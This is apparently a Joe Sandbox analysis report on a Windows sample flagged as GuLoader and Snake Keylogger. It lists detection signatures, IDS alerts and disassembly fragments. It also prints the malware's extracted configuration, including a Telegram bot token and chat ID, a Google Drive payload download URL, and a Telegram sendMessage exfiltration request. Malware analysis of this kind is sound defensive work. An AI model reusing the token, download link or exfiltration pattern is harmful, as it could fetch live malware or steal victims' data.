Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
OW1i3n5K3s.exe

Overview

General Information

Sample name:OW1i3n5K3s.exe
renamed because original name is a hash value
Original sample name:702ceddaa83348514f637a06c19a476999b3a391a7de4fc49efe9fa368fcaa62.exe
Analysis ID:1632404
MD5:20a7c8112e5876adb90550f2fe0c78de
SHA1:1671082a2bf6cb091364ac4c8520c20aefc7cb8a
SHA256:702ceddaa83348514f637a06c19a476999b3a391a7de4fc49efe9fa368fcaa62
Tags:exesignedVIPKeyloggeruser-adrian__luca
Infos:

Detection

GuLoader, Snake Keylogger
Score:100
Range:0 - 100
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected GuLoader
Yara detected Snake Keylogger
Yara detected Telegram RAT
AI detected suspicious PE digital signature
Joe Sandbox ML detected suspicious sample
Switches to a custom stack to bypass stack traces
Tries to detect the country of the analysis system (by using the IP)
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality for read data from the clipboard
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer

Classification

Process Tree

  • System is w10x64
  • OW1i3n5K3s.exe (PID: 7488 cmdline: "C:\Users\user\Desktop\OW1i3n5K3s.exe" MD5: 20A7C8112E5876ADB90550F2FE0C78DE)
    • OW1i3n5K3s.exe (PID: 8128 cmdline: "C:\Users\user\Desktop\OW1i3n5K3s.exe" MD5: 20A7C8112E5876ADB90550F2FE0C78DE)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: Snake Keylogger

{"Exfil Mode": "Telegram", "Token": "8118244750:AAHW9qN4qIFfpwTeDTPtn27qicq6nUcMbog", "Chat_id": "1767942457", "Version": "4.4"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000008.00000002.2505212840.0000000032F8B000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    00000008.00000002.2505212840.0000000032E81000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
      00000008.00000002.2476092324.000000000186B000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
        00000001.00000002.1342316405.00000000053BB000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
          Process Memory Space: OW1i3n5K3s.exe PID: 8128JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            Click to see the 1 entries

            Sigma Signatures

            No Sigma rule has matched

            Suricata Signatures

            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-03-07T23:29:31.198037+010028033053Unknown Traffic192.168.2.449725104.21.32.1443TCP
            2025-03-07T23:29:37.835009+010028033053Unknown Traffic192.168.2.449729104.21.32.1443TCP
            2025-03-07T23:29:44.019332+010028033053Unknown Traffic192.168.2.449733104.21.32.1443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-03-07T23:29:26.132095+010028032742Potentially Bad Traffic192.168.2.449723132.226.8.16980TCP
            2025-03-07T23:29:28.907714+010028032742Potentially Bad Traffic192.168.2.449723132.226.8.16980TCP
            2025-03-07T23:29:32.392043+010028032742Potentially Bad Traffic192.168.2.449726132.226.8.16980TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-03-07T23:29:18.712874+010028032702Potentially Bad Traffic192.168.2.449720142.250.184.206443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-03-07T23:29:58.106064+010018100071Potentially Bad Traffic192.168.2.449740149.154.167.220443TCP

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Found malware configuration
            Source: 00000008.00000002.2505212840.0000000032E81000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Snake Keylogger {"Exfil Mode": "Telegram", "Token": "8118244750:AAHW9qN4qIFfpwTeDTPtn27qicq6nUcMbog", "Chat_id": "1767942457", "Version": "4.4"}
            Multi AV Scanner detection for submitted file
            Source: OW1i3n5K3s.exeVirustotal: Detection: 74%Perma Link
            Source: OW1i3n5K3s.exeReversingLabs: Detection: 65%
            Joe Sandbox ML detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability

            Location Tracking

            barindex
            Tries to detect the country of the analysis system (by using the IP)
            Source: unknownDNS query: name: reallyfreegeoip.org
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_361787A8 CryptUnprotectData,8_2_361787A8
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_36178EF1 CryptUnprotectData,8_2_36178EF1
            Source: OW1i3n5K3s.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.4:49724 version: TLS 1.0
            Source: unknownHTTPS traffic detected: 142.250.184.206:443 -> 192.168.2.4:49720 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.217.16.129:443 -> 192.168.2.4:49722 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49740 version: TLS 1.2
            Source: OW1i3n5K3s.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 1_2_00402910 FindFirstFileW,1_2_00402910
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 1_2_004069DF FindFirstFileW,FindClose,1_2_004069DF
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 1_2_00405D8E CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,1_2_00405D8E
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_00402910 FindFirstFileW,8_2_00402910
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_004069DF FindFirstFileW,FindClose,8_2_004069DF
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_00405D8E CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,8_2_00405D8E
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeFile opened: C:\Users\userJump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Windows\INetCacheJump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeFile opened: C:\Users\user\AppDataJump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeFile opened: C:\Users\user\AppData\Local\Microsoft\WindowsJump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeFile opened: C:\Users\user\AppData\Local\MicrosoftJump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 4x nop then jmp 0258FC19h8_2_0258F961
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 4x nop then jmp 0258F45Dh8_2_0258F2C0
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 4x nop then jmp 0258F45Dh8_2_0258F4AC
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 4x nop then jmp 35F83308h8_2_35F82EF0
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 4x nop then jmp 35F82D41h8_2_35F82A90
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 4x nop then jmp 35F8D069h8_2_35F8CDC0
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 4x nop then jmp 35F8FBD9h8_2_35F8F930
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 4x nop then jmp 35F8F781h8_2_35F8F4D8
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 4x nop then jmp 35F8F329h8_2_35F8F080
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h8_2_35F80040
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 4x nop then jmp 35F8EED1h8_2_35F8EC28
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 4x nop then jmp 35F8EA79h8_2_35F8E7D0
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 4x nop then jmp 35F8E621h8_2_35F8E378
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 4x nop then jmp 35F80D0Dh8_2_35F80B30
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 4x nop then jmp 35F816F8h8_2_35F80B30
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 4x nop then jmp 35F8E1C9h8_2_35F8DF20
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 4x nop then jmp 35F83308h8_2_35F82EE7
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 4x nop then jmp 35F8DD71h8_2_35F8DAC8
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 4x nop then jmp 35F8D919h8_2_35F8D670
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 4x nop then jmp 35F83308h8_2_35F83236
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 4x nop then jmp 35F8D4C1h8_2_35F8D218
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 4x nop then jmp 361748C9h8_2_36174620
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 4x nop then jmp 36177EB5h8_2_36177B78
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 4x nop then jmp 36179280h8_2_36178FB0
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 4x nop then jmp 36176CC1h8_2_36176A18
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 4x nop then jmp 3617ACCFh8_2_3617AA00
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 4x nop then jmp 361732B1h8_2_36173008
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 4x nop then jmp 361762D9h8_2_36176030
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 4x nop then jmp 3617DEFFh8_2_3617DC30
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 4x nop then jmp 36179F1Fh8_2_36179C50
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 4x nop then jmp 36171CF9h8_2_36171A50
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 4x nop then jmp 3617BF0Fh8_2_3617BC40
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 4x nop then jmp 361702E9h8_2_36170040
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 4x nop then jmp 3617F13Fh8_2_3617EE70
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 4x nop then jmp 36177119h8_2_36176E70
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 4x nop then jmp 36174D21h8_2_36174A78
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 4x nop then jmp 36173709h8_2_36173460
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 4x nop then jmp 3617B15Fh8_2_3617AE90
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 4x nop then jmp 36170741h8_2_36170498
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 4x nop then jmp 3617D14Fh8_2_3617CE80
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 4x nop then jmp 36176733h8_2_36176488
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 4x nop then jmp 36172151h8_2_36171EA8
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 4x nop then jmp 36175179h8_2_36174ED0
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 4x nop then jmp 3617C39Fh8_2_3617C0D0
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 4x nop then jmp 3617E38Fh8_2_3617E0C0
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 4x nop then jmp 36177571h8_2_361772C8
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 4x nop then jmp 36170B99h8_2_361708F0
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 4x nop then jmp 3617A3AFh8_2_3617A0E0
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 4x nop then jmp 3617D5DFh8_2_3617D310
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 4x nop then jmp 361725A9h8_2_36172300
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 4x nop then jmp 3617F5CFh8_2_3617F300
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 4x nop then jmp 3617B5EFh8_2_3617B320
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 4x nop then jmp 361779C9h8_2_36177720
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 4x nop then jmp 361755D1h8_2_36175328
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 4x nop then jmp 3617E81Fh8_2_3617E550
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 4x nop then jmp 36172A01h8_2_36172758
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 4x nop then jmp 36170FF1h8_2_36170D48
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 4x nop then jmp 3617A83Fh8_2_3617A570
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 4x nop then jmp 3617C82Fh8_2_3617C560
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 4x nop then jmp 3617FA5Fh8_2_3617F790
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 4x nop then jmp 36175A29h8_2_36175780
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 4x nop then jmp 36172E59h8_2_36172BB0
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 4x nop then jmp 3617BA7Fh8_2_3617B7B0
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 4x nop then jmp 36171449h8_2_361711A0
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 4x nop then jmp 3617DA6Fh8_2_3617D7A0
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 4x nop then jmp 36175E81h8_2_36175BD8
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 4x nop then jmp 36179A8Fh8_2_361797C0
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 4x nop then jmp 3617CCBFh8_2_3617C9F0
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 4x nop then jmp 361718A1h8_2_361715F8
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 4x nop then jmp 3617ECAFh8_2_3617E9E0
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 4x nop then jmp 361E4E18h8_2_361E4B20
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 4x nop then jmp 361E1517h8_2_361E1248
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 4x nop then jmp 361E52E0h8_2_361E4FE8
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 4x nop then jmp 361E2BE7h8_2_361E2918
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 4x nop then jmp 361EBC10h8_2_361EB918
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 4x nop then jmp 361E9108h8_2_361E8E10
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 4x nop then jmp 361E6600h8_2_361E6308
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 4x nop then jmp 361ED3F8h8_2_361ED100
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 4x nop then jmp 361E3507h8_2_361E3238
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 4x nop then jmp 361ECF30h8_2_361ECC38
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 4x nop then jmp 361EA428h8_2_361EA130
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 4x nop then jmp 361E0BF7h8_2_361E0928
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 4x nop then jmp 361E7920h8_2_361E7628
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 4x nop then jmp 361EE718h8_2_361EE420
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 4x nop then jmp 361E3E27h8_2_361E3B58
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 4x nop then jmp 361EE250h8_2_361EDF58
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 4x nop then jmp 361EB748h8_2_361EB450
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 4x nop then jmp 361E8C40h8_2_361E8948
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 4x nop then jmp 361E02E7h8_2_361E0040
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 4x nop then jmp 361E6138h8_2_361E5E40
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 4x nop then jmp 361EFA38h8_2_361EF740
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 4x nop then jmp 361E47E8h8_2_361E4478
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 4x nop then jmp 361E5C70h8_2_361E5978
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 4x nop then jmp 361EF570h8_2_361EF278
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 4x nop then jmp 361ECA68h8_2_361EC770
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 4x nop then jmp 361E1E37h8_2_361E1B68
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 4x nop then jmp 361E9F60h8_2_361E9C68
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 4x nop then jmp 361E7458h8_2_361E7160
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 4x nop then jmp 361E0767h8_2_361E0498
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 4x nop then jmp 361E6F90h8_2_361E6C98
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 4x nop then jmp 361EDD88h8_2_361EDA90
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 4x nop then jmp 361E2757h8_2_361E2488
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 4x nop then jmp 361EB280h8_2_361EAF88
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 4x nop then jmp 361E8778h8_2_361E8480
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 4x nop then jmp 361E1087h8_2_361E0DB8
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 4x nop then jmp 361E82B0h8_2_361E7FB8
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 4x nop then jmp 361E57A8h8_2_361E54B0
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 4x nop then jmp 361EF0A8h8_2_361EEDB0
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 4x nop then jmp 361E3078h8_2_361E2DA8
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 4x nop then jmp 361EC5A0h8_2_361EC2A8
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 4x nop then jmp 361E9A98h8_2_361E97A0
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 4x nop then jmp 361E19A7h8_2_361E16D8
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 4x nop then jmp 361E95D0h8_2_361E92D8
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 4x nop then jmp 361E6AC8h8_2_361E67D0
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 4x nop then jmp 361E3997h8_2_361E36C8
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 4x nop then jmp 361ED8C0h8_2_361ED5C8
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 4x nop then jmp 361EADB8h8_2_361EAAC0
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 4x nop then jmp 361E22C7h8_2_361E1FF8
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 4x nop then jmp 361EA8F0h8_2_361EA5F8
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 4x nop then jmp 361E7DE8h8_2_361E7AF0
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 4x nop then jmp 361E42B7h8_2_361E3FE8
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 4x nop then jmp 361EEBE1h8_2_361EE8E8
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 4x nop then jmp 361EC0D8h8_2_361EBDE0
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]8_2_3620F228
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]8_2_3620F21A
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]8_2_3620F53E
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 4x nop then jmp 36210800h8_2_36210508
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 4x nop then jmp 36210338h8_2_36210040
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]8_2_36242A80
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]8_2_36242A21
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]8_2_36242A70

            Networking

            barindex
            Suricata IDS alerts for network traffic
            Source: Network trafficSuricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.4:49740 -> 149.154.167.220:443
            Uses the Telegram API (likely for C&C communication)
            Source: unknownDNS query: name: api.telegram.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:927537%0D%0ADate%20and%20Time:%2009/03/2025%20/%2001:02:15%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20927537%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
            Source: Joe Sandbox ViewIP Address: 132.226.8.169 132.226.8.169
            Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
            Source: Joe Sandbox ViewIP Address: 104.21.32.1 104.21.32.1
            Source: Joe Sandbox ViewIP Address: 104.21.32.1 104.21.32.1
            Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
            Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
            Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
            Source: unknownDNS query: name: checkip.dyndns.org
            Source: unknownDNS query: name: reallyfreegeoip.org
            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49726 -> 132.226.8.169:80
            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49723 -> 132.226.8.169:80
            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49729 -> 104.21.32.1:443
            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49725 -> 104.21.32.1:443
            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49733 -> 104.21.32.1:443
            Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49720 -> 142.250.184.206:443
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=19xFZwGXpJOSwPWK3hTC0Z2UBRNX2ducA HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: drive.google.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /download?id=19xFZwGXpJOSwPWK3hTC0Z2UBRNX2ducA&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
